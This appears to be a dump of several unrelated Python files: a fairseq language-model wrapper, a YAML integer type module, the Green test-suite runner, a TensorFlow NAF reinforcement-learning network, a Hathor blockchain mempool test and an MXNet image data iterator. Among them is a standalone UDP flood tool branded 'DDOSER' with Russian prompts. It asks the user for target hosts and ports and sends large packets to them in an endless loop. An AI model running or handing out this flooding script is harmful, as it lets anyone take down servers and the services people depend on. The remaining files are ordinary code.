"""Returns the properties dictionary"""
return self.props
def update(self, key, val):
"""Updates property in the properties dictionary [ update("pvp", "true") ] and returns boolean condition"""
if key in self.props.keys():
self.props[key] = val
return True
else:
return False
def save(self):
"""Writes to the new file"""
with open(self.filepath, "a+") as f:
f.truncate(0)
with open(".header") as header:
line = header.readline()
while line:
f.write(line)
line = header.readline()
header.close()
for key, value in self.props.items():
f.write(key + "=" + value + "\n")
if os.path.exists(".header"):
os.remove(".header")
|
55971
|
from fairseq.models.transformer_lm import *
from torch.nn import CrossEntropyLoss
from typing import Any, Dict, List, Optional, Tuple
from torch import Tensor
class TransformerLanguageModelWrapper(TransformerLanguageModel):
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_lm_architecture(args)
if args.decoder_layers_to_keep:
args.decoder_layers = len(args.decoder_layers_to_keep.split(","))
if getattr(args, "max_target_positions", None) is None:
args.max_target_positions = getattr(
args, "tokens_per_sample", DEFAULT_MAX_TARGET_POSITIONS
)
if args.character_embeddings:
embed_tokens = CharacterTokenEmbedder(
task.source_dictionary,
eval(args.character_filters),
args.character_embedding_dim,
args.decoder_embed_dim,
args.char_embedder_highway_layers,
)
elif args.adaptive_input:
embed_tokens = AdaptiveInput(
len(task.source_dictionary),
task.source_dictionary.pad(),
args.decoder_input_dim,
args.adaptive_input_factor,
args.decoder_embed_dim,
options.eval_str_list(args.adaptive_input_cutoff, type=int),
args.quant_noise_pq,
args.quant_noise_pq_block_size,
)
else:
embed_tokens = cls.build_embedding(
args, task.source_dictionary, args.decoder_input_dim
)
if args.tie_adaptive_weights:
assert args.adaptive_input
assert args.adaptive_input_factor == args.adaptive_softmax_factor
assert (
args.adaptive_softmax_cutoff == args.adaptive_input_cutoff
), "{} != {}".format(
args.adaptive_softmax_cutoff, args.adaptive_input_cutoff
)
assert args.decoder_input_dim == args.decoder_output_dim
decoder = TransformerDecoderWrapper(
args, task.target_dictionary, embed_tokens, no_encoder_attn=True
)
return cls(decoder)
class TransformerDecoderWrapper(TransformerDecoder):
def __init__(self, args, dictionary, embed_tokens, no_encoder_attn=False):
super(TransformerDecoderWrapper, self).__init__(args, dictionary, embed_tokens, no_encoder_attn)
self.use_parallel = False
def predict(self, prev_output_tokens, inputs_embeds, attention_mask, labels,
encoder_out=None, incremental_state=None, full_context_alignment=False,
alignment_layer=None, alignment_heads=None):
prev_output_tokens = prev_output_tokens.to("cuda:0")
inputs_embeds = inputs_embeds.to("cuda:0")
# embed positions
positions = (
self.embed_positions(
prev_output_tokens, incremental_state=None
)
if self.embed_positions is not None
else None
)
prev_output_tokens = prev_output_tokens.to("cuda:0")
x = self.embed_scale * inputs_embeds
if self.quant_noise is not None:
x = self.quant_noise(x)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions.to("cuda:0")
if self.layernorm_embedding is not None:
x = self.layernorm_embedding(x)
x = self.dropout_module(x)
x = x.transpose(0, 1)
self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx)
# decoder layers
attn: Optional[Tensor] = None
#inner_states: List[Optional[Tensor]] = [x]
for idx, layer in enumerate(self.layers):
if incremental_state is None and not full_context_alignment:
self_attn_mask = self.buffered_future_mask(x)
else:
self_attn_mask = None
x, layer_attn, _ = layer(
x,
encoder_out.encoder_out if encoder_out is not None else None,
encoder_out.encoder_padding_mask if encoder_out is not None else None,
incremental_state,
self_attn_mask=self_attn_mask,
self_attn_padding_mask=self_attn_padding_mask,
need_attn=bool((idx == alignment_layer)),
need_head_weights=bool((idx == alignment_layer)),
)
#inner_states.append(x)
if layer_attn is not None and idx == alignment_layer:
attn = layer_attn.float().to(x)
if attn is not None:
if alignment_heads is not None:
attn = attn[:alignment_heads]
# average probabilities over heads
attn = attn.mean(dim=0)
x = x.to("cuda:0")
if self.layer_norm is not None:
x = self.layer_norm(x)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
if self.project_out_dim is not None:
x = self.project_out_dim(x)
lm_logits = self.output_layer(x)
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
if labels is not None:
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
# return loss, lm_logits
return lm_logits, loss
else:
return lm_logits, None
|
55984
|
from __future__ import print_function,absolute_import,division,unicode_literals
_B=False
_A=None
from .compat import no_limit_int
from .anchor import Anchor
if _B:from typing import Text,Any,Dict,List
__all__=['ScalarInt','BinaryInt','OctalInt','HexInt','HexCapsInt','DecimalInt']
class ScalarInt(no_limit_int):
def __new__(D,*E,**A):
F=A.pop('width',_A);G=A.pop('underscore',_A);C=A.pop('anchor',_A);B=no_limit_int.__new__(D,*E,**A);B._width=F;B._underscore=G
if C is not _A:B.yaml_set_anchor(C,always_dump=True)
return B
def __iadd__(A,a):B=type(A)(A+a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __ifloordiv__(A,a):B=type(A)(A//a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __imul__(A,a):B=type(A)(A*a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __ipow__(A,a):B=type(A)(A**a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
def __isub__(A,a):B=type(A)(A-a);B._width=A._width;B._underscore=A._underscore[:]if A._underscore is not _A else _A;return B
@property
def anchor(self):
A=self
if not hasattr(A,Anchor.attrib):setattr(A,Anchor.attrib,Anchor())
return getattr(A,Anchor.attrib)
def yaml_anchor(A,any=_B):
if not hasattr(A,Anchor.attrib):return _A
if any or A.anchor.always_dump:return A.anchor
return _A
def yaml_set_anchor(A,value,always_dump=_B):A.anchor.value=value;A.anchor.always_dump=always_dump
class BinaryInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class OctalInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class HexInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class HexCapsInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
class DecimalInt(ScalarInt):
def __new__(A,value,width=_A,underscore=_A,anchor=_A):return ScalarInt.__new__(A,value,width=width,underscore=underscore,anchor=anchor)
|
55991
|
from __future__ import unicode_literals
from __future__ import print_function
from fnmatch import fnmatch
import sys
from unittest.suite import _call_if_exists, _DebugResult, _isnotsuite, TestSuite
from unittest import util
import unittest
from io import StringIO
from green.config import default_args
from green.output import GreenStream
from green.result import ProtoTest
class GreenTestSuite(TestSuite):
"""
This version of a test suite has two important functions:
1) It brings Python 3.x-like features to Python 2.7
2) It adds Green-specific features (see customize())
"""
args = None
def __init__(self, tests=(), args=None):
# You should either set GreenTestSuite.args before instantiation, or
# pass args into __init__
self._removed_tests = 0
self.allow_stdout = default_args.allow_stdout
self.full_test_pattern = "test" + default_args.test_pattern
self.customize(args)
super(GreenTestSuite, self).__init__(tests)
def addTest(self, test):
"""
Override default behavior with some green-specific behavior.
"""
if (
self.full_test_pattern
# test can actually be suites and things. Only tests have
# _testMethodName
and getattr(test, "_testMethodName", False)
# Fake test cases (generated for module import failures, for example)
# do not start with 'test'. We still want to see those fake cases.
and test._testMethodName.startswith("test")
):
if not fnmatch(test._testMethodName, self.full_test_pattern):
return
super(GreenTestSuite, self).addTest(test)
def customize(self, args):
"""
Green-specific behavior customization via an args dictionary from
the green.config module. If you don't pass in an args dictionary,
then this class acts like TestSuite from Python 3.x.
"""
# Set a new args on the CLASS
if args:
self.args = args
# Use the class args
if self.args and getattr(self.args, "allow_stdout", None):
self.allow_stdout = self.args.allow_stdout
if self.args and getattr(self.args, "test_pattern", None):
self.full_test_pattern = "test" + self.args.test_pattern
def _removeTestAtIndex(self, index):
"""
Python 3.x-like version of this function for Python 2.7's sake.
"""
test = self._tests[index]
if hasattr(test, "countTestCases"):
self._removed_tests += test.countTestCases()
self._tests[index] = None
def countTestCases(self):
"""
Python 3.x-like version of this function for Python 2.7's sake.
"""
cases = self._removed_tests
for test in self:
if test:
cases += test.countTestCases()
return cases
def _handleClassSetUpPre38(self, test, result): # pragma: nocover
previousClass = getattr(result, "_previousTestClass", None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False): # pragma: no cover
return
try:
currentClass._classSetupFailed = False
except TypeError: # pragma: no cover
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, "setUpClass", None)
if setUpClass is not None:
_call_if_exists(result, "_setupStdout")
try:
setUpClass()
# Upstream Python forgets to take SkipTest into account
except unittest.case.SkipTest as e:
currentClass.__unittest_skip__ = True
currentClass.__unittest_skip_why__ = str(e)
# -- END of fix
except Exception as e: # pragma: no cover
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
errorName = "setUpClass (%s)" % className
self._addClassOrModuleLevelException(result, e, errorName)
finally:
_call_if_exists(result, "_restoreStdout")
def _handleClassSetUpPost38(
self, test, result
): # pragma: no cover -- because it's just like *Pre38
previousClass = getattr(result, "_previousTestClass", None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False):
return
try:
currentClass._classSetupFailed = False
except TypeError:
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, "setUpClass", None)
if setUpClass is not None:
_call_if_exists(result, "_setupStdout")
try:
setUpClass()
# Upstream Python forgets to take SkipTest into account
except unittest.case.SkipTest as e:
currentClass.__unittest_skip__ = True
currentClass.__unittest_skip_why__ = str(e)
# -- END of fix
except Exception as e:
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
self._createClassOrModuleLevelException(
result, e, "setUpClass", className
)
finally:
_call_if_exists(result, "_restoreStdout")
if currentClass._classSetupFailed is True:
currentClass.doClassCleanups()
if len(currentClass.tearDown_exceptions) > 0:
for exc in currentClass.tearDown_exceptions:
self._createClassOrModuleLevelException(
result, exc[1], "setUpClass", className, info=exc
)
if sys.version_info < (3, 8): # pragma: no cover
_handleClassSetUp = _handleClassSetUpPre38
else:
_handleClassSetUp = _handleClassSetUpPost38
def run(self, result):
"""
Emulate unittest's behavior, with Green-specific changes.
"""
topLevel = False
if getattr(result, "_testRunEntered", False) is False:
result._testRunEntered = topLevel = True
for index, test in enumerate(self):
if result.shouldStop:
break
if _isnotsuite(test):
self._tearDownPreviousClass(test, result)
self._handleModuleFixture(test, result)
self._handleClassSetUp(test, result)
result._previousTestClass = test.__class__
if getattr(test.__class__, "_classSetupFailed", False) or getattr(
result, "_moduleSetUpFailed", False
):
continue
if not self.allow_stdout:
captured_stdout = StringIO()
captured_stderr = StringIO()
saved_stdout = sys.stdout
saved_stderr = sys.stderr
sys.stdout = GreenStream(captured_stdout)
sys.stderr = GreenStream(captured_stderr)
test(result)
if _isnotsuite(test):
if not self.allow_stdout:
sys.stdout = saved_stdout
sys.stderr = saved_stderr
result.recordStdout(test, captured_stdout.getvalue())
result.recordStderr(test, captured_stderr.getvalue())
# Since we're intercepting the stdout/stderr out here at the
# suite level, we need to poke the test result and let it know
# when we're ready to transmit results back up to the parent
# process. I would rather just do it automatically at test
# stop time, but we don't have the captured stuff at that
# point. Messy...but the only other alternative I can think of
# is monkey-patching loaded TestCases -- which could be from
# unittest or twisted or some other custom subclass.
result.finalize()
self._removeTestAtIndex(index)
# Green's subprocesses have handled all actual tests and sent up the
# result, but unittest expects to be able to add teardown errors to
# the result still, so we'll need to watch for that ourself.
errors_before = len(result.errors)
if topLevel:
self._tearDownPreviousClass(None, result)
self._handleModuleTearDown(result)
result._testRunEntered = False
# Special handling for class/module tear-down errors. startTest() and
# finalize() both trigger communication between the subprocess and
# the runner process. addError()
if errors_before != len(result.errors):
difference = len(result.errors) - errors_before
result.errors, new_errors = (
result.errors[:-difference],
result.errors[-difference:],
)
for (test, err) in new_errors:
# test = ProtoTest()
test.module = result._previousTestClass.__module__
test.class_name = result._previousTestClass.__name__
# test.method_name = 'some method name'
test.is_class_or_module_teardown_error = True
test.name = "Error in class or module teardown"
# test.docstr_part = 'docstr part' # error_holder.description
result.startTest(test)
result.addError(test, err)
result.stopTest(test)
result.finalize()
return result
|
55999
|
import base_network
import numpy as np
import ou_noise
import signal
import tensorflow as tf
import tensorflow.contrib.slim as slim
import util
def add_opts(parser):
parser.add_argument('--share-conv-net', type=bool, default=True,
help="if set (dft) we have one network for processing input img that"
" is shared between value, l_value and output_action networks."
" if not set each net has it's own network.")
parser.add_argument('--use-dropout', action='store_true',
help="if set use a dropout layer after flattened conv net output")
parser.add_argument('--discount', type=float, default=0.99,
help="discount for RHS of bellman equation update")
parser.add_argument('--action-noise-theta', type=float, default=0.01,
help="OrnsteinUhlenbeckNoise theta (rate of change) param for action"
" exploration")
parser.add_argument('--action-noise-sigma', type=float, default=0.1,
help="OrnsteinUhlenbeckNoise sigma (magnitude) param for action"
" exploration")
parser.add_argument('--action-init-weights', type=float, default=0.001,
help="init action final layer weights to (uniform) [-V, V]")
VERBOSE_DEBUG = False
def toggle_verbose_debug(signal, frame):
global VERBOSE_DEBUG
VERBOSE_DEBUG = not VERBOSE_DEBUG
signal.signal(signal.SIGUSR1, toggle_verbose_debug)
class ValueNetwork(base_network.Network):
""" Value network component of a NAF network. Created as seperate net because it has a target network."""
def __init__(self, namespace, input_state, opts):
super(ValueNetwork, self).__init__(namespace)
with tf.variable_scope(namespace):
# do potential horizontal flipping of input state
# recall input is (batch, height, width, rgb) and we want to flip on width
flipped_input_state = tf.cond(base_network.FLIP_HORIZONTALLY,
lambda: tf.reverse(input_state, dims=[False, False, True, False]),
lambda: input_state)
# expose self.input_state_representation since it will be the network "shared"
# by l_value & output_action network when running --share-input-state-representation
self.conv_net_output = self.conv_net_on(flipped_input_state, opts)
self.hidden_layers = self.hidden_layers_on(self.conv_net_output, [100, 50])
self.value = slim.fully_connected(scope='fc',
inputs=self.hidden_layers,
num_outputs=1,
weights_regularizer=tf.contrib.layers.l2_regularizer(0.01),
activation_fn=None) # (batch, 1)
class NafNetwork(base_network.Network):
def __init__(self, namespace,
action_dim, opts):
super(NafNetwork, self).__init__(namespace)
# noise to apply to actions during rollouts
self.exploration_noise = ou_noise.OrnsteinUhlenbeckNoise(action_dim,
opts.action_noise_theta,
opts.action_noise_sigma)
# s1 and s2 placeholders
batched_state_shape = [None, opts.height, opts.width, 3]
self.input_state = tf.placeholder(shape=batched_state_shape, dtype=tf.uint8)
self.input_state_2 = tf.placeholder(shape=batched_state_shape, dtype=tf.uint8)
# value (and target value) sub networks
self.value_net = ValueNetwork("value", self.input_state, opts)
self.target_value_net = ValueNetwork("target_value", self.input_state_2, opts)
# build other placeholders
self.input_action = tf.placeholder(shape=[None, action_dim],
dtype=tf.float32, name="input_action")
self.reward = tf.placeholder(shape=[None, 1],
dtype=tf.float32, name="reward")
self.terminal_mask = tf.placeholder(shape=[None, 1],
dtype=tf.float32, name="terminal_mask")
self.importance_weight = tf.placeholder(shape=[None, 1],
dtype=tf.float32, name="importance_weight")
with tf.variable_scope(namespace):
# mu (output_action) is also a simple NN mapping input state -> action
# this is our target op for inference (i.e. value that maximises Q given input_state)
with tf.variable_scope("output_action"):
if opts.share_conv_net:
conv_net_output = self.value_net.conv_net_output
else:
conv_net_output = self.conv_net_on(input_state, opts)
hidden_layers = self.hidden_layers_on(conv_net_output, [100, 50])
weights_initializer = tf.random_uniform_initializer(-opts.action_init_weights, opts.action_init_weights)
self.output_action = slim.fully_connected(scope='fc',
inputs=hidden_layers,
num_outputs=action_dim,
weights_initializer=weights_initializer,
weights_regularizer=tf.contrib.layers.l2_regularizer(0.01),
activation_fn=tf.nn.tanh) # (batch, action_dim)
# do potentially horizontal flipping on action x (corresponding to
# an x-axis flip of input states)
input_action = tf.cond(base_network.FLIP_HORIZONTALLY,
lambda: self.input_action * tf.constant([-1.0, 1.0]),
lambda: self.input_action)
# A (advantage) is a bit more work and has three components...
# first the u / mu difference. note: to use in a matmul we need
# to convert this vector into a matrix by adding an "unused"
# trailing dimension
u_mu_diff = input_action - self.output_action # (batch, action_dim)
u_mu_diff = tf.expand_dims(u_mu_diff, -1) # (batch, action_dim, 1)
# next we have P = L(x).L(x)_T where L is the values of lower triangular
# matrix with diagonals exp'd. yikes!
# first the L lower triangular values; a network on top of the input state
num_l_values = (action_dim*(action_dim+1))/2
with tf.variable_scope("l_values"):
if opts.share_conv_net:
conv_net_output = self.value_net.conv_net_output
else:
conv_net_output = self.conv_net_on(input_state, opts)
hidden_layers = self.hidden_layers_on(conv_net_output, [100, 50])
l_values = slim.fully_connected(scope='fc',
inputs=hidden_layers,
num_outputs=num_l_values,
weights_regularizer=tf.contrib.layers.l2_regularizer(0.01),
activation_fn=None)
# we will convert these l_values into a matrix one row at a time.
rows = []
self._l_values = l_values
# each row is made of three components;
# 1) the lower part of the matrix, i.e. elements to the left of diagonal
# 2) the single diagonal element (that we exponentiate)
# 3) the upper part of the matrix; all zeros
batch_size = tf.shape(l_values)[0]
row_idx = 0
for row_idx in xrange(action_dim):
row_offset_in_l = (row_idx*(row_idx+1))/2
lower = tf.slice(l_values, begin=(0, row_offset_in_l), size=(-1, row_idx))
diag = tf.exp(tf.slice(l_values, begin=(0, row_offset_in_l+row_idx), size=(-1, 1)))
upper = tf.zeros((batch_size, action_dim - tf.shape(lower)[1] - 1)) # -1 for diag
rows.append(tf.concat(1, [lower, diag, upper]))
# full L matrix is these rows packed.
L = tf.pack(rows, 0)
# and since leading axis in l was always the batch
# we need to transpose it back to axis0 again
L = tf.transpose(L, (1, 0, 2)) # (batch_size, action_dim, action_dim)
self.check_L = tf.check_numerics(L, "L")
# P is L.L_T
L_T = tf.transpose(L, (0, 2, 1)) # TODO: update tf & use batch_matrix_transpose
P = tf.batch_matmul(L, L_T) # (batch_size, action_dim, action_dim)
# can now calculate advantage
u_mu_diff_T = tf.transpose(u_mu_diff, (0, 2, 1))
advantage = -0.5 * tf.batch_matmul(u_mu_diff_T, tf.batch_matmul(P, u_mu_diff)) # (batch, 1, 1)
# and finally we need to reshape off the axis we added to be able to matmul
self.advantage = tf.reshape(advantage, [-1, 1]) # (batch, 1)
# Q is value + advantage
self.q_value = self.value_net.value + self.advantage
# target y is reward + discounted target value
self.target_y = self.reward + (self.terminal_mask * opts.discount * \
self.target_value_net.value)
self.target_y = tf.stop_gradient(self.target_y)
# loss is squared difference that we want to minimise rescaled by important weight
self.loss = tf.pow(self.q_value - self.target_y, 2)
rescaled_loss = self.loss * self.importance_weight
with tf.variable_scope("optimiser"):
# dynamically create optimiser based on opts
optimiser = util.construct_optimiser(opts)
# calc gradients
gradients = optimiser.compute_gradients(tf.reduce_mean(rescaled_loss))
# potentially clip and wrap with debugging tf.Print
gradients, self.print_gradient_norms = util.clip_and_debug_gradients(gradients, opts)
# apply
self.train_op = optimiser.apply_gradients(gradients)
# sanity checks (in the dependent order)
checks = []
for op, name in [(l_values, 'l_values'), (L,'L'), (self.loss, 'loss')]:
checks.append(tf.check_numerics(op, name))
self.check_numerics = tf.group(*checks)
def setup_target_network(self):
self.target_value_net.set_as_target_network_for(self.value_net, 0.01)
def action_given(self, state, add_noise):
# NOTE: noise is added _outside_ tf graph. we do this simply because the noisy output
# is never used for any part of computation graph required for online training. it's
# only used during training after being the replay buffer.
actions = tf.get_default_session().run(self.output_action,
feed_dict={self.input_state: [state],
base_network.IS_TRAINING: False,
base_network.FLIP_HORIZONTALLY: False})
if add_noise:
if VERBOSE_DEBUG:
pre_noise = str(actions)
actions[0] += self.exploration_noise.sample()
actions = np.clip(1, -1, actions) # action output is _always_ (-1, 1)
if VERBOSE_DEBUG:
print "TRAIN action_given pre_noise %s post_noise %s" % (pre_noise, actions)
return map(float, np.squeeze(actions))
def train(self, batch):
flip_horizontally = np.random.random() < 0.5
if VERBOSE_DEBUG:
print "batch.action"
print batch.action.T
print "batch.reward", batch.reward.T
print "batch.terminal_mask", batch.terminal_mask.T
print "flip_horizontally", flip_horizontally
print "weights", batch.weight.T
values = tf.get_default_session().run([self._l_values, self.value_net.value,
self.advantage, self.target_value_net.value,
self.print_gradient_norms],
feed_dict={self.input_state: batch.state_1,
self.input_action: batch.action,
self.reward: batch.reward,
self.terminal_mask: batch.terminal_mask,
self.input_state_2: batch.state_2,
self.importance_weight: batch.weight,
base_network.IS_TRAINING: True,
base_network.FLIP_HORIZONTALLY: flip_horizontally})
values = [np.squeeze(v) for v in values]
print "_l_values", values[0].T
print "value_net.value ", values[1].T
print "advantage ", values[2].T
print "target_value_net.value ", values[3].T
_, _, l = tf.get_default_session().run([self.check_numerics, self.train_op,
self.loss],
feed_dict={self.input_state: batch.state_1,
self.input_action: batch.action,
self.reward: batch.reward,
self.terminal_mask: batch.terminal_mask,
self.input_state_2: batch.state_2,
self.importance_weight: batch.weight,
base_network.IS_TRAINING: True,
base_network.FLIP_HORIZONTALLY: flip_horizontally})
return l
|
56048
|
import random
from hathor.crypto.util import decode_address
from hathor.graphviz import GraphvizVisualizer
from hathor.simulator import FakeConnection
from tests import unittest
from tests.utils import add_blocks_unlock_reward
class BaseHathorSyncMempoolTestCase(unittest.TestCase):
__test__ = False
def setUp(self):
super().setUp()
self.network = 'testnet'
self.manager1 = self.create_peer(self.network, unlock_wallet=True)
self.manager1.avg_time_between_blocks = 4
self.genesis = self.manager1.tx_storage.get_all_genesis()
self.genesis_blocks = [tx for tx in self.genesis if tx.is_block]
def _add_new_tx(self, address, value):
from hathor.transaction import Transaction
from hathor.wallet.base_wallet import WalletOutputInfo
outputs = []
outputs.append(
WalletOutputInfo(address=decode_address(address), value=int(value), timelock=None))
tx = self.manager1.wallet.prepare_transaction_compute_inputs(Transaction, outputs, self.manager1.tx_storage)
tx.timestamp = int(self.clock.seconds())
tx.storage = self.manager1.tx_storage
tx.weight = 10
tx.parents = self.manager1.get_new_tx_parents()
tx.resolve()
tx.verify()
self.manager1.propagate_tx(tx)
self.clock.advance(10)
return tx
def _add_new_transactions(self, num_txs):
txs = []
for _ in range(num_txs):
address = self.get_address(0)
value = random.choice([5, 10, 50, 100, 120])
tx = self._add_new_tx(address, value)
txs.append(tx)
return txs
def _add_new_block(self, propagate=True):
block = self.manager1.generate_mining_block()
self.assertTrue(block.resolve())
block.verify()
self.manager1.on_new_tx(block, propagate_to_peers=propagate)
self.clock.advance(10)
return block
def _add_new_blocks(self, num_blocks, propagate=True):
blocks = []
for _ in range(num_blocks):
blocks.append(self._add_new_block(propagate=propagate))
return blocks
def test_mempool_basic(self):
# 10 blocks
self._add_new_blocks(2)
# N blocks to unlock the reward
add_blocks_unlock_reward(self.manager1)
# 5 transactions to be confirmed by the next blocks
self._add_new_transactions(5)
# 2 more blocks
self._add_new_blocks(2)
# 30 transactions in the mempool
self._add_new_transactions(30)
debug_pdf = False
if debug_pdf:
dot1 = GraphvizVisualizer(self.manager1.tx_storage, include_verifications=True, include_funds=True).dot()
dot1.render('mempool-test')
manager2 = self.create_peer(self.network, enable_sync_v1=True)
self.assertEqual(manager2.state, manager2.NodeState.READY)
conn = FakeConnection(self.manager1, manager2)
for _ in range(1000):
if conn.is_empty():
break
conn.run_one_step(debug=True)
self.clock.advance(1)
self.assertConsensusValid(self.manager1)
self.assertConsensusValid(manager2)
self.assertConsensusEqual(self.manager1, manager2)
# 3 genesis
# 25 blocks
# Unlock reward blocks
# 8 txs
self.assertEqual(len(manager2.tx_storage._mempool_tips_index), 1)
self.assertEqual(len(self.manager1.tx_storage._mempool_tips_index), 1)
class SyncV1HathorSyncMempoolTestCase(unittest.SyncV1Params, BaseHathorSyncMempoolTestCase):
__test__ = True
class SyncV2HathorSyncMempoolTestCase(unittest.SyncV2Params, BaseHathorSyncMempoolTestCase):
__test__ = True
# sync-bridge should behave like sync-v2
class SyncBridgeHathorSyncMempoolTestCase(unittest.SyncBridgeParams, SyncV2HathorSyncMempoolTestCase):
pass
|
56133
|
import os
import socket
import time
from textwrap import dedent
def attack(ip, port):
global sent
global max
sock.sendto(str.encode(bytes), (ip, int(port)))
sent += 1
print(
"\033[36m%s пакетов убила сервер (остановка Ctrl+z) - %s:%s" % (sent, ip, port)
)
if mode == "y":
if sent == max:
max += 1000
time.sleep(0.5)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
os.system("clear")
print(
dedent(
"""\
\033[33m
██████╗░██████╗░░█████╗░░██████╗███████╗██████╗░
██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗
██║░░██║██║░░██║██║░░██║╚█████╗░█████╗░░██████╔╝
██║░░██║██║░░██║██║░░██║░╚═══██╗██╔══╝░░██╔══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝███████╗██║░░██║
╚═════╝░╚═════╝░░╚════╝░╚═════╝░╚══════╝╚═╝░░╚═╝
Made by pkgsearch\n"""
)
)
bytes = "qwerty" * 2000
sent = 0
max = 1000
ips = input("\033[36mIP/Host нехорошего сайта (127.0.0.1; 127.0.0.1,192.168.1.1): ")
ips = (ips + ",").split(",")
ips.pop()
ports = input("\033[36mСколько портов использовать? (80; 80,8080,443; all): ")
if ports != "all":
ports = (ports + ",").split(",")
ports.pop()
mode = "\033[36mВключить медленный режим? (y; n): "
os.system("clear")
print("Запуск...")
time.sleep(0.5)
port_for_fast = 1
while True:
for ip in ips:
try:
if ports != "all":
for port in ports:
attack(ip, port)
else:
attack(ip, port_for_fast)
port_for_fast += 1
if port_for_fast == 65536:
port_for_fast = 1
except:
print("\033[36mСервер (остановка Ctrl+z) " + ip + " уничтожен!")
|
56146
|
import numpy as np
from multiprocessing import Process, Queue
from mxnet.io import DataIter, DataBatch
import mxnet as mx
import numpy as np
from mxnet.io import DataIter
from PIL import Image
import os
import preprocessing
import logging
import sys
#rgb_mean=(140.5192, 59.6655, 63.8419), #mean on tote trainval
class TrainDataIterator(DataIter):
def __init__(self,
root_dir,
flist_path,
rgb_mean=(128,128,128),
random_flip=True,
random_scale=False,
random_rotate=True,
scale_range=(0.8, 1.2),
crop_size=400,
random_crop=True,
epoch_size=True,
label_shrink_scale=1.0,
shuffle=True,
data_queue_size=100,
batch_size=1,
data_worker_num=1):
self.rgb_mean = np.array(rgb_mean, dtype=np.uint8).reshape((1,1,3))
self.random_flip = random_flip
self.random_scale = random_scale
self.random_rotate = random_rotate
self.scale_range = scale_range
assert scale_range[1]>=scale_range[0]>0
self.crop_size = crop_size
self.label_shrink_scale = label_shrink_scale
self.random_crop = random_crop
self.epoch_size = epoch_size
self.data_count = 0
self.shuffle = shuffle
self.batch_size = batch_size
self.flist = None
self.root_dir = root_dir
self._load_flist(flist_path)
self.data_num = self.get_data_num()
self.avail_data_num = self.data_num
self.cursor = 0
self.reset_list()
self.flist_item_queue = Queue(maxsize=1000)
self.list_producer = Process(target=self._produce_flist_item)
self.list_producer.daemon = True
self.list_producer.start()
self.data_queue = Queue(maxsize=data_queue_size)
for i in range(data_worker_num):
producer = Process(target=self._produce_data)
producer.daemon = True
producer.start()
def _produce_flist_item(self):
while True:
if self.cursor + 1 <= self.data_num:
file = self.flist[self.cursor]
self.flist_item_queue.put(file)
self.cursor += 1
else:
self.reset_list()
def _produce_data(self):
while True:
flist_item = self.flist_item_queue.get()
value = self._process_data(flist_item)
if value is not None:
self.data_queue.put(value)
def get_data(self):
images = []
labels = []
for i in range(self.batch_size):
data = self.data_queue.get()
images.append(data[0])
labels.append(data[1])
images = np.concatenate(images)
labels = np.concatenate(labels)
return (mx.nd.array(images), mx.nd.array(labels))
def get_data_num(self):
return len(self.flist)
def _load_flist(self,
flist_path):
with open(flist_path) as f:
lines = f.readlines()
self.flist = []
for line in lines:
if len(line.rstrip()) == 0:
continue
item = self._parse_flist_item(line.rstrip())
self.flist.append(item)
self.data_num = len(self.flist)
def reset_list(self):
self.cursor = 0
if self.shuffle:
np.random.shuffle(self.flist)
def _process_data(self, item):
try:
im = Image.open(os.path.join(self.root_dir, item[0]))
im = im.convert("RGB")
l = Image.open(os.path.join(self.root_dir, item[1]))
except Exception as e:
logging.info(e)
return None
if self.random_rotate:
deg = np.random.rand(1) * 360
im=im.rotate(deg, resample=Image.BICUBIC, expand=True)
l=l.rotate(deg, resample=Image.NEAREST, expand=True)
im_arr = np.array(im)
l_arr = np.array(l)
r_start, c_start, new_crop_size = preprocessing.calc_crop_params(im_arr, self.scale_range, self.crop_size)
#random flip
if self.random_flip:
im_arr, l_arr = preprocessing.random_flip(im_arr, l_arr)
im_arr, l_arr = preprocessing.pad_image(im_arr, l_arr, new_crop_size, self.rgb_mean)
#do crop
if self.random_crop:
im_arr = im_arr[r_start:r_start+new_crop_size, c_start:c_start+new_crop_size, :]
l_arr = l_arr[r_start:r_start+new_crop_size, c_start:c_start+new_crop_size]
#do resize
im_arr = Image.fromarray(im_arr).resize((self.crop_size, self.crop_size), Image.BICUBIC)
im_arr = np.array(im_arr, dtype=np.float32)
im_arr -= self.rgb_mean
l_dim = int(self.crop_size*self.label_shrink_scale)
l_arr = Image.fromarray(l_arr).resize((l_dim, l_dim), Image.NEAREST)
l_arr = np.array(l_arr, dtype=np.uint8)
im_arr = np.expand_dims(im_arr, 0)
im_arr = np.transpose(im_arr, [0, 3, 1, 2])
l_arr = l_arr.reshape(1, -1)
